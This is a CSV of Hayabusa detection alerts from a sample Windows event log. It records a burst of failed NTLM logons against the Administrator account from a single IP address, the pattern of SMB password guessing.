2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
